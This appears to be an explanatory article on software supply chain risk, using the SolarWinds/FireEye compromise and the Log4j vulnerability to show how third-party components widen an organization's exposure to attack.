How to effectively protect your software supply chains from cyber attacks
Software supply chains have become a dangerous vulnerability in organizations and may allow attackers to penetrate internal networks. Although the risk is high, organizations can still take action to protect themselves and prevent attacks through this supply chain vulnerability.
For a long time, only a few specialists were interested in security risks posed by the supply chain, particularly software supply chains. After the cyber attack on the IT security company FireEye at the end of 2020, many IT managers got a resounding wake-up call. During this incident, attackers were able to penetrate the company’s systems via an automated patch management system. Before this occurrence, the same attackers had compromised the Orion platform of the IT service specialist SolarWinds. The Sunburst vulnerability, as it was named, was therefore not directly caused by FireEye, but through its software supplier, which had not detected and closed the exploited vulnerability in time.
It is expected that 18,000 of the approximate 35,000 companies and authorities that worked with the Orion platform at the time fell victim to this attack. But even two years after, still nobody knows how much damage was really caused. This is because contemporary software is a complex ecosystem that hardly anyone can keep track of, but this is not without reason. The days when small teams or freelancers were able to develop an application on their own and bring it to market are long gone. Instead, programmers today often rely on external frameworks, libraries, and other third-party components to implement certain functions with less effort.
Third-party software increases attack trajectories
Although software development today would be unthinkable without third party components, the software supply chain poses considerably high risks and increases attack trajectories. Almost every application used in organizations today depends in some way on other components. Many first became aware of this critical situation when the security vulnerability in the logging software Log4j was reported. The news hit like a bomb. Many experts feared catastrophic effects on the Internet. Thankfully, things didn't get too bad at first, although many administrators still had their hands full.
In many cases, nobody knew exactly where Log4j was used. The software was not only used directly in integrated components, but it was also used in sub-components and their dependencies. In recent years, many organizations have allowed software and services to proliferate wildly, which is now becoming a very serious problem. The zero-day exploit in Log4j code takes advantage of this situation and in more dire situations it can be misused to execute foreign code on the affected system. Effects of vulnerabilities like these can be devastating and can lead to data breaches where confidential information is stolen. Not to mention that attackers could also stealthily manipulate or delete data, inject malware or ransomware and harvest computing power to mine cryptocurrencies.
Affected companies of this attack include major cloud providers such as Amazon Web Services (AWS), Apple’s iCloud services, and the Steam gaming platform. It doesn’t bear thinking about what could have happened if these services had been exploited to distribute manipulated updates. Unfortunately, this was the case with SolarWinds. However, once again, the full extent of damages caused by the Log4j vulnerability, even just in relation to this incident cannot yet be estimated. Security experts assume that in many cases the vulnerability was used to secretly install a back door, which eventually could be used to facilitate attacks when the coast is clear.